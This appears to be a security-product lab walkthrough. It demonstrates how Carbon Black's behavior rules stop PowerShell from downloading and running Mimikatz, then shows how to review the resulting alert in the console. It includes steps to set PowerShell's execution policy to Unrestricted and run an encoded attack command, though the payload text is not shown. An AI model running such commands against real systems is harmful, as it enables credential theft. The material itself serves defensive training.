After achieving initial access, attackers attempt to move forward with their goals. One of the most effective ways of doing that is scraping credentials or abusing binaries that already exist in the environment, such as PowerShell. A trusted program like PowerShell is not blocked by traditional signature-based AV. It is used across Windows environments for legitimate purposes, but attackers can leverage it for malicious ends as well.
In this attack we will leverage PowerShell to attempt malicious actions. Unlike the sample from the last alert we ran, PowerShell itself has no known-malware reputation. Instead, Carbon Black applies prevention by looking at the behaviors the application exhibits and by recognizing that PowerShell is trying to execute content that contains malware (Mimikatz). Behavior-based rules can apply prevention even to trusted tools when they are being used maliciously.
We will use PowerShell to run an attack that leverages Mimikatz. The command has been base64-encoded for obfuscation.
- Run PowerShell with administrative privileges
- Run command Set-ExecutionPolicy Unrestricted
- Run command below
powershell.exe -encodedCommand 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
Carbon Black applies prevention, killing the malicious PowerShell instance. PowerShell attempts to leverage Mimikatz to scrape credentials; Carbon Black recognizes that behavior, terminates the instance and prevents the credential theft. Note that PowerShell was allowed to run as expected until it began behaving maliciously.
We will now pivot to the Carbon Black Console to review information about the attack we just ran. If you are not currently on the Alerts page, navigate to Alerts using the left-hand menu.
- Navigate to the new alert (severity 8) and click the chevron to expand alert details
The reputation for PowerShell is trusted whitelist, which is expected; in most cases we expect PowerShell to run normally without prevention, as it is used in many everyday IT activities. The power of Carbon Black is that we can define the behaviors we want to prevent while still allowing PowerShell to run when it should.
If your alert does not appear, refresh the console URL page and check again (the console URL, NOT the Horizon URL).
- Click the first PowerShell.exe node
In this attack PowerShell attempted to run an encoded command. Carbon Black automatically decodes encoded PowerShell command lines, shortening time to remediation and improving investigative ability.
We can now see the formatted PowerShell script. In this case PowerShell downloads Mimikatz and attempts to invoke it before being prevented by Carbon Black. The attacker would use Mimikatz to harvest credentials for further attack actions.
- Click the 'X' to close out of the CMD Line screen
- Click the second PowerShell.exe node
Note the red shield icon, which indicates that Carbon Black applied prevention. Additional process details, including the behaviors exhibited by this specific instance of PowerShell, can be viewed on the right.